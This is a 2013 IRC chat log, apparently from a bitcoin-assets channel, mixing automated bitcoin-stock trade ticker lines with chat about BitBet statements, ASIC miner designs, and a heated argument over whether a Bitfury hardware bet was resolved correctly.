0.003445 = 1.6398 BTC [-] Sep 06 21:53:58 yes fuckin finally Sep 06 21:53:59 You got a degree from bullshit! Sep 06 21:54:01 someone ignored me Sep 06 21:54:04 [BTCTC] [ACTIVEMINING] 400 @ 0.003994 = 1.5976 BTC [-] Sep 06 21:54:05 [BTCTC] [ACTIVEMINING] 32 @ 0.003832 = 0.1226 BTC [-] Sep 06 21:54:06 this takes effort. Sep 06 21:54:07 [BTCTC] [ACTIVEMINING] 129 @ 0.003831 = 0.4942 BTC [-] Sep 06 21:54:07 :\ Sep 06 21:54:08 [BTCTC] [ACTIVEMINING] 50 @ 0.003822 = 0.1911 BTC [-] Sep 06 21:54:09 [BTCTC] [ACTIVEMINING] 3 @ 0.003821 = 0.0115 BTC [-] Sep 06 21:54:10 [BTCTC] [ACTIVEMINING] 3 @ 0.00382 = 0.0115 BTC [-] Sep 06 21:54:10 [BTCTC] [ACTIVEMINING] 197 @ 0.00382 = 0.7525 BTC [-] Sep 06 21:54:11 [BTCTC] [ACTIVEMINING] 480 @ 0.003803 = 1.8254 BTC [-] Sep 06 21:54:12 [BTCTC] [ACTIVEMINING] 1000 @ 0.003802 = 3.802 BTC [-] Sep 06 21:54:13 [BTCTC] [ACTIVEMINING] 1 @ 0.003802 BTC [-] Sep 06 21:54:14 [BTCTC] [ACTIVEMINING] 30 @ 0.003801 = 0.114 BTC [-] Sep 06 21:54:15 [BTCTC] [ACTIVEMINING] 791 @ 0.0038 = 3.0058 BTC [-] Sep 06 21:54:16 [BTCTC] [ACTIVEMINING] 100 @ 0.0038 = 0.38 BTC [-] Sep 06 21:58:12 [BTCTC] [TAT.ASICMINER] 10 @ 0.0209 = 0.209 BTC [+] Sep 06 21:59:36 mircea_poescu: you linked me to your blog a few weeks back. am i understanding correctly that 0.01 btc = 1 credit = 1 article, one time read? Sep 06 22:01:05 afaik its 1000 credits per 1 dollar or something Sep 06 22:01:44 ah Sep 06 22:01:59 [BTCTC] [TAT.ASICMINER] 2 @ 0.02012 = 0.0402 BTC [-] Sep 06 22:02:00 [BTCTC] [TAT.ASICMINER] 1 @ 0.0201 BTC [-] Sep 06 22:02:09 he is gone to a party Sep 06 22:02:12 [BTCTC] [TAT.ASICMINER] 9 @ 0.0201 = 0.1809 BTC [-] Sep 06 22:02:12 so im here to bitch. Sep 06 22:02:40 [BTCTC] [DMS.MINING] 92 @ 0.002399 = 0.2207 BTC [+] Sep 06 22:02:59 [BTCTC] [LABCOIN] 5 @ 0.003401 = 0.017 BTC [-] Sep 06 22:03:01 [BTCTC] [LABCOIN] 95 @ 0.0034 = 0.323 BTC [-] Sep 06 22:03:15 [HAVELOCK] [AM100] 24 @ 0.0198001 = 0.4752 BTC [-] Sep 06 22:03:37 [BTCTC] [TAT.ASICMINER] 40 @ 0.0209 = 0.836 BTC [+] Sep 06 22:07:14 [BTCTC] [TAT.ASICMINER] 2 @ 0.02089 = 0.0418 BTC [-] Sep 06 22:07:23 [BTCTC] [DMS.MINING] 28 @ 0.0024 = 0.0672 BTC [+] Sep 06 22:08:17 [BTCTC] [TAT.ASICMINER] 27 @ 0.0209 = 0.5643 BTC [+] Sep 06 22:08:30 [BTCTC] [BASIC-MINING] 2 @ 0.1303 = 0.2606 BTC [+] Sep 06 22:08:31 [BTCTC] [BASIC-MINING] 10 @ 0.1302 = 1.302 BTC [-] Sep 06 22:08:33 [BTCTC] [BASIC-MINING] 2 @ 0.1301 = 0.2602 BTC [-] Sep 06 22:08:33 [BTCTC] [BASIC-MINING] 10 @ 0.13 = 1.3 BTC [-] Sep 06 22:08:34 [BTCTC] [BASIC-MINING] 1 @ 0.1299 BTC [-] Sep 06 22:08:35 [BTCTC] [BASIC-MINING] 3 @ 0.126 = 0.378 BTC [-] Sep 06 22:08:37 [BTCTC] [BASIC-MINING] 1 @ 0.125 BTC [-] Sep 06 22:08:38 [BTCTC] [BASIC-MINING] 5 @ 0.12 = 0.6 BTC [-] Sep 06 22:08:39 [BTCTC] [BASIC-MINING] 23 @ 0.1199 = 2.7577 BTC [-] Sep 06 22:08:39 lol who pulled the plug Sep 06 22:08:40 [BTCTC] [BASIC-MINING] 10 @ 0.119 = 1.19 BTC [-] Sep 06 22:09:55 [BTCTC] [BTC-TRADING-PT] 7 @ 1.176 = 8.232 BTC [+] Sep 06 22:10:01 [HAVELOCK] [AM1] 2 @ 2.09 = 4.18 BTC [+] Sep 06 22:10:22 [HAVELOCK] [AM100] 30 @ 0.0198001 = 0.594 BTC [-] Sep 06 22:10:32 [HAVELOCK] [AM100] 3 @ 0.0198001 = 0.0594 BTC [-] Sep 06 22:14:25 [HAVELOCK] [AM1] 2 @ 2.09 = 4.18 BTC [+] Sep 06 22:14:54 [HAVELOCK] [AM100] 14 @ 0.0198001 = 0.2772 BTC [-] Sep 06 22:18:06 [HAVELOCK] [XBOND] 20 @ 0.001033 = 0.0207 BTC [-] Sep 06 22:18:36 [BTCTC] [COG.F2] 1 @ 4.875 BTC [+] Sep 06 22:23:59 picostocks down for 3 days Sep 06 22:24:09 [HAVELOCK] [AM100] 1 @ 0.01975 BTC [-] Sep 06 22:24:17 business is fun fun fun! Sep 06 22:24:25 lets BTC partee Sep 06 22:28:37 What do you guys think: http://imgur.com/YaGf6RR Sep 06 22:29:01 NO FANS! SCAM! Sep 06 22:29:06 did you do this Sep 06 22:29:14 No. My bro did. Sep 06 22:29:22 The FH on side needs work Sep 06 22:29:31 It's like a 10 minute mockup Sep 06 22:29:39 he wanted to know about the general look Sep 06 22:29:41 Looks like you took a label maker and put it on the top side Sep 06 22:29:48 It does. I agree. Sep 06 22:29:51 your bro did what and why Sep 06 22:30:03 [BTCTC] [BTC-TRADING-PT] 10 @ 1 = 10 BTC [-] Sep 06 22:30:04 It looks like Ken thought about it shart it out Sep 06 22:30:10 jk it looks nice ;) Sep 06 22:30:24 I think the name on the top should have less depth and the FH on the side needs polished. Sep 06 22:31:55 I'll pass on the critique. Sep 06 22:32:10 you cant ctrl-z on irc Sep 06 22:32:54 [BTCTC] [DMS.MINING] 1 @ 0.0024 BTC [+] Sep 06 22:33:26 [BTCTC] [DMS.MINING] 50 @ 0.002399 = 0.12 BTC [-] Sep 06 22:33:43 add some flames so it would look faster Sep 06 22:33:47 what up with s.bbet divs? Sep 06 22:34:01 what about them Sep 06 22:34:37 is there a div this month? it was due yesterday, no Sep 06 22:34:38 ? Sep 06 22:35:33 section 3.2(g) Sep 06 22:37:53 [BTCTC] [LABCOIN] 1 @ 0.003435 BTC [+] Sep 06 22:38:12 [BTCTC] [COG.F] 1 @ 4 BTC [+] Sep 06 22:38:21 [HAVELOCK] [AM1] 1 @ 2.089 BTC [-] Sep 06 22:38:27 well Sep 06 22:38:36 [HAVELOCK] [AM100] 2 @ 0.01975 = 0.0395 BTC [-] Sep 06 22:38:39 mircea went out having fun and this is what you get when btc is fun fun fun Sep 06 22:39:17 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.000651 BTC [+] Sep 06 22:39:27 anyway the statement was published Sep 06 22:40:13 http://i1178.photobucket.com/albums/x380/timtruss11/Nihlists1_zps7d624776.jpg Sep 06 22:40:30 oh it was? my bad, linkage? Sep 06 22:41:20 http://trilema.com/2013/bitbet-august-2013-statement/ Sep 06 22:41:26 BitBet, August 2013 Statement pe Trilema - Un blog de Mircea Popescu. Sep 06 22:41:27 i guess the divs will follow shorty if they are not out yet Sep 06 22:41:28 ok thx. Sep 06 22:41:53 i dont do that, i just sign statements and kick butt. Sep 06 22:42:31 [BTCTC] [TAT.ASICMINER] 2 @ 0.02007 = 0.0401 BTC [-] Sep 06 22:42:51 ahh. :] Sep 06 22:43:28 [BTCTC] [TAT.ASICMINER] 10 @ 0.02006 = 0.2006 BTC [-] Sep 06 22:43:28 Total bets in worth 470.61293880 BTC. << nice! Sep 06 22:43:29 [BTCTC] [TAT.ASICMINER] 6 @ 0.02003 = 0.1202 BTC [-] Sep 06 22:43:30 [BTCTC] [TAT.ASICMINER] 30 @ 0.02002 = 0.6006 BTC [-] Sep 06 22:44:20 [BTCTC] [ASICMINER-PT] 1 @ 2.32 BTC [+] Sep 06 22:44:42 [BTCTC] [TAT.ASICMINER] 4 @ 0.02001 = 0.08 BTC [-] Sep 06 22:44:44 [BTCTC] [TAT.ASICMINER] 6 @ 0.02002 = 0.1201 BTC [+] Sep 06 22:45:42 [HAVELOCK] [SMG] 6 @ 0.00019258 = 0.0012 BTC [-] Sep 06 22:45:45 [BTCTC] [ASICMINER-PT] 1 @ 2.21 BTC [-] Sep 06 22:46:08 [BTCTC] [TAT.ASICMINER] 4 @ 0.02089 = 0.0836 BTC [+] Sep 06 22:48:54 i should have just checked trilema, didn't realize that the statement was published on the 3rd, and the one for s.mg on the 5th. Sep 06 22:48:56 [BTCTC] [TAT.ASICMINER] 2 @ 0.0209 = 0.0418 BTC [+] Sep 06 22:49:11 [BTCTC] [ACTIVEMINING] 200 @ 0.003975 = 0.795 BTC [+] Sep 06 22:49:12 [BTCTC] [DMS.SELLING] 1 @ 0.0099 BTC [+] Sep 06 22:49:13 [BTCTC] [ACTIVEMINING] 10 @ 0.003993 = 0.0399 BTC [+] Sep 06 22:49:15 [BTCTC] [ACTIVEMINING] 10 @ 0.003994 = 0.0399 BTC [+] Sep 06 22:49:16 [BTCTC] [TAT.ASICMINER] 3 @ 0.02003 = 0.0601 BTC [-] Sep 06 22:49:22 yeah mod6 it seems to be picking up speed, bbet i mean Sep 06 22:49:45 *nod* more than double prev. month looks like from the statement. Sep 06 22:49:47 but the bets that last for a month dont come out in the profits until they are resolved Sep 06 22:49:54 thats why there is a delay from input to output Sep 06 22:50:07 sorry Sep 06 22:50:11 that last for more than a month i ment Sep 06 22:50:25 yeah. i remember such from previous months. thats ok. no problem at all. Sep 06 22:50:53 mhm Sep 06 22:50:58 just thought you guys forgot or something. you know, girls and blow or something :) Sep 06 22:50:58 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.000651 BTC [+] Sep 06 22:51:20 yeah business is fun! Sep 06 22:51:40 haha. my internet has been out for most of the week, so been a bit hard to keep up. Sep 06 22:52:04 i think my cable modem is faulty and loses blocksync with the CMTS. got a guy coming out today to check it out.. Sep 06 22:52:22 to be clear, my last line was sarcastic, so somebody doesnt get the wrong idea Sep 06 22:52:23 https://bitcointalk.org/index.php?topic=288962.msg3096212#msg3096212 Sep 06 22:52:28 Fanpas.com sports betting pre-IPO plan Sep 06 22:52:42 kleeck_: still ASUS copyright violation, still not a reasonable design for an asic (needs cooling, not cute SSD housing for gamers) Sep 06 22:53:19 lol they ripped asus? Sep 06 22:53:26 i was just kidding to, you guys are on top of * Sep 06 22:53:27 jesus fuck how low can you go Sep 06 22:53:35 yes, it's an ASUS RAIDR Sep 06 22:53:40 [BTCTC] [TAT.MINIGAME] 4 @ 0.0002745 = 0.0011 BTC [-] Sep 06 22:53:47 zomg Sep 06 22:53:48 :| Sep 06 22:53:59 [BTCTC] [TAT.ASICMINER] 20 @ 0.02003 = 0.4006 BTC [-] Sep 06 22:54:01 [BTCTC] [TAT.ASICMINER] 10 @ 0.02003 = 0.2003 BTC [-] Sep 06 22:54:01 [BTCTC] [TAT.ASICMINER] 100 @ 0.02002 = 2.002 BTC [-] Sep 06 22:54:02 [BTCTC] [TAT.ASICMINER] 20 @ 0.02001 = 0.4002 BTC [-] Sep 06 22:54:04 [BTCTC] [TAT.ASICMINER] 100 @ 0.02 = 2 BTC [-] Sep 06 22:54:11 the design is pretty unique (and has no pratcicality, it is designed to look good) Sep 06 22:54:49 bah s/to/too/ Sep 06 22:55:01 pankkake ridiculus Sep 06 22:56:01 [HAVELOCK] [LABCO] 1000 @ 0.0032 = 3.2 BTC [+] Sep 06 22:56:36 asic should look more like diy bombs http://shrani.si/f/2s/f0/3Let7dci/imag0357.jpg Sep 06 22:57:16 asicminer does it right then Sep 06 22:57:28 mhm Sep 06 22:57:39 fury also Sep 06 22:57:45 you gotta solder those yourself Sep 06 22:57:47 bitcoin is money for terrorists anyway Sep 06 22:57:48 [BTCTC] [DMS.MINING] 7 @ 0.0024 = 0.0168 BTC [+] Sep 06 22:57:50 or at least fix the soldering Sep 06 22:57:59 hehe Sep 06 22:58:02 [BTCTC] [PETA-MINE] 10 @ 0.6599 = 6.599 BTC [-] Sep 06 22:58:23 [MPEX] [S.MPOE] 13360 @ 0.00088172 = 11.7798 BTC [+] Sep 06 22:58:24 [MPEX] [S.MPOE] 1041 @ 0.00087838 = 0.9144 BTC [-] Sep 06 22:59:31 [BTCTC] [PETA-MINE] 11 @ 0.6599 = 7.2589 BTC [-] Sep 06 23:01:50 did u ever get the fury that you ordered kakobrekla? or am i mistaken that you ordered one? Sep 06 23:05:56 [BTCTC] [LABCOIN] 70 @ 0.003403 = 0.2382 BTC [-] Sep 06 23:07:07 [BTCTC] [LABCOIN] 6 @ 0.003445 = 0.0207 BTC [+] Sep 06 23:07:11 i didnt order anything but i get some chips from the first batch free of charge Sep 06 23:07:30 oh ok. thats neat. Sep 06 23:07:40 [BTCTC] [TAT.VIRTUALMINE] 25 @ 0.000551 = 0.0138 BTC [-] Sep 06 23:07:42 [BTCTC] [TAT.VIRTUALMINE] 15 @ 0.00055 = 0.0083 BTC [-] Sep 06 23:07:54 [BTCTC] [LABCOIN] 6 @ 0.003446 = 0.0207 BTC [+] Sep 06 23:08:18 maybe you confused it with bitfurry https://furstore.appspot.com/ Sep 06 23:08:29 [HAVELOCK] [AM100] 50 @ 0.01922 = 0.961 BTC [-] Sep 06 23:08:36 haha. Sep 06 23:09:42 ive been wrapping up my most recent contract, it's been hard to keep up with all the latest. Sep 06 23:09:53 s/get/got, anywho. Sep 06 23:10:09 what contract Sep 06 23:10:12 i thought i read in there somewhere too that kako showed up at this scammars "office" or "factory" in his neck of the woods and it just didn't exist. Sep 06 23:10:27 oh yeah Sep 06 23:10:37 we debunked primeasic on the second day Sep 06 23:10:45 lol kudos Sep 06 23:11:05 yeah i drove all night just to get finger up my ass Sep 06 23:11:22 i've been doing a software architect contract job for the last 2.5 years. finally done with that now. Sep 06 23:11:25 Sounds like a good night Sep 06 23:11:39 [BTCTC] [ASICMINER-PT] 1 @ 2.181 BTC [-] Sep 06 23:12:06 it was far to the place 'eh? Sep 06 23:13:46 [BTCTC] [DMS.MINING] 49 @ 0.0024 = 0.1176 BTC [+] Sep 06 23:15:48 mod6 just over 500km in one direction Sep 06 23:16:01 oh wow. ya, that's a hike. Sep 06 23:16:17 well Sep 06 23:16:21 mp paid for gas. :D Sep 06 23:16:28 That's cute Sep 06 23:16:31 heheh. :) Sep 06 23:17:08 [BTCTC] [TAT.ASICMINER] 7 @ 0.02087 = 0.1461 BTC [+] Sep 06 23:17:16 [HAVELOCK] [AM100] 10 @ 0.019211 = 0.1921 BTC [-] Sep 06 23:17:19 [BTCTC] [COGNITIVE] 4 @ 0.32 = 1.28 BTC [+] Sep 06 23:17:31 [BTCTC] [TAT.ASICMINER] 46 @ 0.02001 = 0.9205 BTC [-] Sep 06 23:17:33 [BTCTC] [TAT.ASICMINER] 6 @ 0.02001 = 0.1201 BTC [-] Sep 06 23:17:34 [BTCTC] [TAT.ASICMINER] 197 @ 0.02 = 3.94 BTC [-] Sep 06 23:18:09 [BTCTC] [KENILWORTH] 1 @ 0.0018 BTC [+] Sep 06 23:22:00 [BTCTC] [TAT.VIRTUALMINE] 14 @ 0.000651 = 0.0091 BTC [+] Sep 06 23:22:26 [BTCTC] [ASICMINER-PT] 1 @ 2.181 BTC [-] Sep 06 23:23:04 Seeking capital --- Toronto startup working with quantum physics faculty and post-docs, developing software for conventional hardware which efficiently emulates universal quantum systems (including quantum search algorithms which are effective for mining coin) Sep 06 23:24:26 [BTCTC] [TAT.ASICMINER] 11 @ 0.02003 = 0.2203 BTC [+] Sep 06 23:24:28 [BTCTC] [TAT.ASICMINER] 37 @ 0.02002 = 0.7407 BTC [-] Sep 06 23:25:16 [BTCTC] [ASICMINER-PT] 2 @ 2.181 = 4.362 BTC [-] Sep 06 23:25:20 [BTCTC] [ASICMINER-PT] 1 @ 2.18 BTC [-] Sep 06 23:26:23 [BTCTC] [ASICMINER-PT] 1 @ 2.18 BTC [-] Sep 06 23:26:25 [HAVELOCK] [AM100] 1 @ 0.01921001 BTC [-] Sep 06 23:26:51 [HAVELOCK] [AM100] 10 @ 0.01921 = 0.1921 BTC [-] Sep 06 23:26:53 [BTCTC] [ASICMINER-PT] 2 @ 2.18 = 4.36 BTC [-] Sep 06 23:28:04 [HAVELOCK] [XBOND] 800 @ 0.00104 = 0.832 BTC [+] Sep 06 23:28:27 [BTCTC] [TAT.VIRTUALMINE] 3 @ 0.000651 = 0.002 BTC [+] Sep 06 23:28:41 [BTCTC] [ACTIVEMINING] 450 @ 0.00402 = 1.809 BTC [+] Sep 06 23:28:50 [HAVELOCK] [AM100] 90 @ 0.0192 = 1.728 BTC [-] Sep 06 23:30:28 [HAVELOCK] [AM100] 1 @ 0.0192 BTC [-] Sep 06 23:31:55 [HAVELOCK] [VTX] 5 @ 0.56 = 2.8 BTC [-] Sep 06 23:31:55 jorash urlpls Sep 06 23:35:11 kakobrekla: we had lengthy discussion just some 2 days ago Sep 06 23:35:20 that caused headache to mircea :D Sep 06 23:35:29 was it in -assets? Sep 06 23:35:35 yes Sep 06 23:35:36 must be in log then Sep 06 23:35:52 and the url is http://www.noospheer.org/ Sep 06 23:37:41 [HAVELOCK] [AM100] 10 @ 0.01911 = 0.1911 BTC [-] Sep 06 23:39:06 yeah im having a discussion now with jorash Sep 06 23:39:15 apparently fuckface Luke-Jr is involved Sep 06 23:39:18 so this is going nowhere. Sep 06 23:39:43 [HAVELOCK] [VTX] 5 @ 0.55500001 = 2.775 BTC [-] Sep 06 23:39:56 lol didn't know about luke.. you have bigger interrogative powers Sep 06 23:40:22 Luke-Jr is sketpical of our claim that we can simulate QC, but in teh event we do, he is willing to assist from a dev persective. Sep 06 23:42:35 [HAVELOCK] [AM100] 55 @ 0.01910001 = 1.0505 BTC [-] Sep 06 23:45:16 [MPEX] [S.MPOE] 1371 @ 0.00088305 = 1.2107 BTC [+] Sep 06 23:46:24 [BTCTC] [ACTIVEMINING] 10 @ 0.00394 = 0.0394 BTC [-] Sep 06 23:47:10 [BTCTC] [ACTIVEMINING] 253 @ 0.003939 = 0.9966 BTC [-] Sep 06 23:48:07 [BTCTC] [ACTIVEMINING] 70 @ 0.003901 = 0.2731 BTC [-] Sep 06 23:48:08 [BTCTC] [ACTIVEMINING] 58 @ 0.003806 = 0.2207 BTC [-] Sep 06 23:49:07 [BTCTC] [LABCOIN] 5 @ 0.003483 = 0.0174 BTC [+] Sep 06 23:49:08 [BTCTC] [LABCOIN] 945 @ 0.003494 = 3.3018 BTC [+] Sep 06 23:49:23 [HAVELOCK] [AM100] 90 @ 0.01911 = 1.7199 BTC [+] Sep 06 23:52:35 [BTCTC] [DMS.MINING] 485 @ 0.0024 = 1.164 BTC [+] Sep 06 23:56:00 [BTCTC] [DMS.MINING] 2 @ 0.002398 = 0.0048 BTC [-] Sep 06 23:56:01 [BTCTC] [DMS.MINING] 61 @ 0.002389 = 0.1457 BTC [-] Sep 06 23:56:53 [BTCTC] [ASICMINER-PT] 1 @ 2.18 BTC [-] Sep 06 23:58:07 [MPEX] [S.MPOE] 250 @ 0.00087826 = 0.2196 BTC [-] Sep 06 23:58:09 [MPEX] [S.MPOE] 3750 @ 0.00087779 = 3.2917 BTC [-] Sep 06 23:58:44 [BTCTC] [ASICMINER-PT] 1 @ 2.153 BTC [-] Sep 07 00:00:59 [BTCTC] [DMS.MINING] 14 @ 0.0024 = 0.0336 BTC [+] Sep 07 00:04:13 [BTCTC] [DMS.MINING] 1 @ 0.0024 BTC [+] Sep 07 00:05:53 https://bitcointalk.org/index.php?topic=289316 Sep 07 00:05:58 BitBet incorrectly declares yes to a no bet. Stay Away from BitBet! Sep 07 00:07:48 its interesting Sep 07 00:07:54 how little attention that got Sep 07 00:07:57 must be some reason?! Sep 07 00:08:37 [BTCTC] [BASIC-MINING] 2 @ 0.1375 = 0.275 BTC [+] Sep 07 00:09:13 [HAVELOCK] [AM100] 20 @ 0.0203 = 0.406 BTC [+] Sep 07 00:09:18 they did meet the power specifications, i.e. < 1 w / gh/s? Sep 07 00:11:26 yup Sep 07 00:11:43 more chips than were expected though i think was complaint Sep 07 00:12:43 well, so the only problem is based on the definition of the term "unit" Sep 07 00:13:15 the bet allows for broad definiton of unit - like a bag of gpus would do. Sep 07 00:13:46 oh my, don't discuss it for 3rd time Sep 07 00:13:51 right? solder it up yaself, and if it hits 1/1, call it a day Sep 07 00:13:58 yup Sep 07 00:14:19 butthurt. butthurt everywhere. Sep 07 00:17:04 [BTCTC] [ASICMINER-PT] 1 @ 2.289 BTC [+] Sep 07 00:17:05 [BTCTC] [ASICMINER-PT] 1 @ 2.29 BTC [+] Sep 07 00:17:19 [MPEX] [S.MPOE] 8129 @ 0.00088185 = 7.1686 BTC [+] Sep 07 00:19:18 just to be clear -- there was a SPECIFIC definition of what a unit was on the bitfury website Sep 07 00:19:41 1 m-board, 16 h-cards,, 1 raspberry pi is a 400Gh kit or unit Sep 07 00:19:46 anything else is NOT a unit AS Advertised Sep 07 00:19:48 the bet was a no Sep 07 00:20:09 I will spent the next 5 years posting and re posting this until Bitbet refunds all 'no' bets from their own pocket Sep 07 00:20:24 anyone got ideas on why gox is finally correcting and removing the huge gap in price between it and other exchanges? major arbitrage players finally got their $20m fiat moving in other places to bring btc into gox to sell? Sep 07 00:20:39 and if they refund, I'll be happy to write a positive article about them making up for their mistakes Sep 07 00:20:53 [BTCTC] [ACTIVEMINING] 6 @ 0.003995 = 0.024 BTC [+] Sep 07 00:20:55 lol Sep 07 00:21:05 thanks for all the future mentions. Sep 07 00:21:26 The forums will never hear the end of it Sep 07 00:21:36 it will be like a thorn in the side of all Sep 07 00:21:46 until justice has prevailed Sep 07 00:22:26 and, i've already started coding a bitbet clone with 0% fees, and a transparent bet deciding process Sep 07 00:22:43 fun :) Sep 07 00:23:21 its what btc is all about dontyaknow fun fun fun and hobbies. Sep 07 00:24:51 fractal: how do you monetize this? Sep 07 00:25:17 monetize what? Sep 07 00:25:21 1. You order an "unit" Sep 07 00:25:32 a bettting website without fees Sep 07 00:25:35 2. You will get more HW but it sitill matches he specs Sep 07 00:25:46 3. You sue you didn't got the "unit" Sep 07 00:25:48 dexX7: I short BBet stock. Sep 07 00:25:53 4. You presumalby lose Sep 07 00:25:54 lol Sep 07 00:26:07 neat answer Sep 07 00:31:53 [00:26] jurov: thats not what the bet says -- it says as advertised [00:26] jurov: AS ADVERTISED>. everybody seems to miss the AS ADVERTISED part [00:26] 1 M-board, 16H-card, 1 R-pi. thats 1 unit. if that hardware doesn't do 400Gh, the bet is a no Sep 07 00:32:18 by all logical definitions the bet is a no because it contains the word 'advertised' when reffering to the unit Sep 07 00:32:31 if it didn't say 'as advertised' thats a different story Sep 07 00:32:35 key word here is 'advertised' Sep 07 00:33:21 can someone explain me why "CBTC" on Havelock is offering different price/unit - on "overview" they want 3MIO * 0.00018 and on the public offering site each share is valued with 0.0002. Is this some kind of rounding happening? Sep 07 00:33:55 because 3MIO*0.0002 = 600BTC instead of 540BTC Sep 07 00:35:00 performance was what was advertised, not how many boards/cards Sep 07 00:37:29 [BTCTC] [ASICMINER-PT] 1 @ 2.152 BTC [-] Sep 07 00:38:58 [MPEX] [S.MPOE] 4950 @ 0.00088528 = 4.3821 BTC [+] Sep 07 00:39:13 MCM-Mike: rounding error (only display) Sep 07 00:39:33 oh fractal Sep 07 00:39:36 nobody cares Sep 07 00:39:37 [BTCTC] [ASICMINER-PT] 10 @ 2.16 = 21.6 BTC [+] Sep 07 00:39:53 don't be a sore loser. it's really not attractive. Sep 07 00:39:59 this is what I thought Sep 07 00:40:01 [BTCTC] [TAT.ASICMINER] 5 @ 0.02087 = 0.1044 BTC [+] Sep 07 00:40:15 and don't waste time fighting an elephant. Sep 07 00:40:20 just go do something useful. Sep 07 00:41:41 fractal: maybe a useful thing would be to collect statistics on bitbet disputes Sep 07 00:42:00 [BTCTC] [LABCOIN] 1 @ 0.003449 BTC [-] Sep 07 00:42:03 then you'd quantify something that the rest of us intuit, which is that it's a negligible percentage. Sep 07 00:42:08 jurov, and it didnt meet performance specs Sep 07 00:43:10 benkay_: its not a matter of being a sore loser -- if i lost id be happy to congratulate the winner and move on. --- its a matter of being robbed / scammed/ defrauded Sep 07 00:43:32 fractal: betsofbitco.in exists fyi Sep 07 00:44:01 fractal: what's the sum total you lost? some thousands of dollars? you're choosing to get angry instead of getting smart. Sep 07 00:44:02 benkay_: my job is to warn others to avoid the site so they dont get robbed/scammed/defrauded... and i will continue to do this daily , for years to come. bitbet is welcome to do the right thing and pay out no bets and the noise will go away Sep 07 00:44:43 fractal: that's basically blackmail, and is image-wise indistinguishable from the hit you'll take from being a sore loser Sep 07 00:44:54 Luke-Jr betsofbitcoin is dead Sep 07 00:44:59 like your soul. Sep 07 00:45:13 eventually you'll tire of it, and then just be another human who whined about being scammed on a loosey-goosey bet definition. Sep 07 00:45:25 what's blackmail? is it blackmail to tell pirateat40 he should repay loans? Sep 07 00:45:32 looks plenty alive to me Sep 07 00:45:51 change your eyeballs or even better, the whole head. Sep 07 00:45:58 [BTCTC] [LABCOIN] 5 @ 0.003401 = 0.017 BTC [-] Sep 07 00:46:04 fractal: you don't sound liek you know MP well. Sep 07 00:46:10 fractal: what's funny to me is that you're the only person arguing the "as advertised" clause supersedes the bet definition. Sep 07 00:46:20 [BTCTC] [ASICMINER-PT] 5 @ 2.15 = 10.75 BTC [-] Sep 07 00:46:22 [BTCTC] [ASICMINER-PT] 1 @ 2.103 BTC [-] Sep 07 00:46:23 [BTCTC] [ASICMINER-PT] 1 @ 2.101 BTC [-] Sep 07 00:46:24 [BTCTC] [ASICMINER-PT] 10 @ 2.1 = 21 BTC [-] Sep 07 00:46:41 it's pretty common for a clause in english to be followed by a definition Sep 07 00:46:45 and the definition is typically what sticks Sep 07 00:46:50 No. My goal is to spread word on the forums about the bitbet fraud, and then launch an exact clone of bitbet.us with 0% fees. I will then short BBet on MPEX and profit as it dwindles to zero. Sep 07 00:46:50 fractal just made it in my ignore list, congratulations Sep 07 00:46:52 and will be what sticks in this case as well. Sep 07 00:47:01 I thought after the bet he would finally shut up/grow up Sep 07 00:47:02 benkay_: of course it does. all clauses in the bet must be valid for it to be YES Sep 07 00:47:02 [BTCTC] [TAT.ASICMINER] 1 @ 0.02087 BTC [+] Sep 07 00:47:21 benkay_: the bet definition is irrelevant unless all conditions/clauses are met Sep 07 00:48:13 pankkake: i am here specifically for you. infact i will change nicks tomorrow and complain about the bet every day i see you in here for years to come. congratulations. Sep 07 00:48:45 pankkake: your ignore list will be very nice with lots of nicks on it Sep 07 00:49:32 fractal: I have to agree with the bet conclusion in this case, sorry. Sep 07 00:50:02 no no Sep 07 00:50:07 betsofbitcoin!! Sep 07 00:50:24 Luke-Jr: thats ok... but the hardware didn't perform as advertised, so the bet would be a NO. Sep 07 00:50:28 fractal, i think you do have a point. though resulting the bet in "no" would have been far worse imho. thus instead of arguing and calling it fraud, i suggest you should put your effort into creating guidelines or similar to prevent fuzzy situations like this in the future. Sep 07 00:50:40 a 400Gh unit is 1M-board, 16 H-cards, and 1 Ri-Pi Sep 07 00:50:44 fractal: it didn't? from what I'm reading, it outperformed advertised specs Sep 07 00:51:09 Luke-Jr: http://www.bitfurystrikesback.com/product/400gh-miner-october-2013/ Sep 07 00:51:15 fractal: ok, so? customers who ordered it got BETTER than that.. Sep 07 00:51:25 Luke-Jr: you're absolutely right. Sep 07 00:51:51 "meet" usually includes "better than" Sep 07 00:52:06 Luke-Jr: however, the bet language states that the 400Gh UNIT must perform as advertised, and it only does 365Gh. Sep 07 00:52:17 following this approach a "unit" consising of a hasher with 400 w power consumption, but 408.3 gh/s would result in "no", too? Sep 07 00:52:43 fractal: http://www.merriam-webster.com/dictionary/unit Sep 07 00:52:43 lol two idiots arguing. Sep 07 00:52:46 Luke-Jr: It's like saying that the KnC Jupiter miner must be 400GH/sec.... and then its 350Gh.... but the company ships 2 of them.... doesn't make up for the fact that the actual unit was not 400gh Sep 07 00:52:57 fractal: i'm going to bet 1 btc you can't ship a betting site that beats bitbet's committed coins for a rolling three month period Sep 07 00:53:05 within the year Sep 07 00:53:09 will you take this bet? Sep 07 00:53:11 Luke-Jr: Unit as advertised is specifically 1M-board, 16H-cards, 1R-pi. this UNIT does not do 400Gh Sep 07 00:53:36 benkay_: absolutely i'll take that bet. I'll have to word it better tho Sep 07 00:53:37 fractal: they delivered MORE than that as the unit. that's just getting better specs. Sep 07 00:54:21 Luke-Jr: What they delivered doesn't change the fact that the UNIT as advertised (1M-board, 16H-cards, 1R-Pi) doesn't do 400Gh.... thats what the bet is about... Sep 07 00:54:45 fractal: second condition: this bet will clear on bitbet Sep 07 00:54:47 the unit was advertised to have 16 H-cards, but the unit as delivered had a bonus H-card. it's still a unit. Sep 07 00:54:54 benkay_: lol Sep 07 00:54:55 fractal: because i don't trust you. Sep 07 00:55:07 [MPEX] [S.MPOE] 9000 @ 0.00088565 = 7.9709 BTC [+] Sep 07 00:55:21 fractal: but, am more than happy to let you write the terms. Sep 07 00:55:29 Luke-Jr: If the bet said that an Avalon Batch 2 Unit must do 60Gh, and you got 2 that did 50Gh each, does that make the bet a YES? The actual unit as advertised didn't do 60Gh Sep 07 00:56:02 Luke-Jr: The unit delivered didn't have an extra H-card... it was a seperate unit completely Sep 07 00:56:02 if it fit into power then YES is better answer than NO or DRAW Sep 07 00:56:27 fractal: except for the defined terms (meets performance), the bet left "unit" up to the company to define Sep 07 00:56:57 also, you just used "unit" (first instance) to refer to the entire thing Sep 07 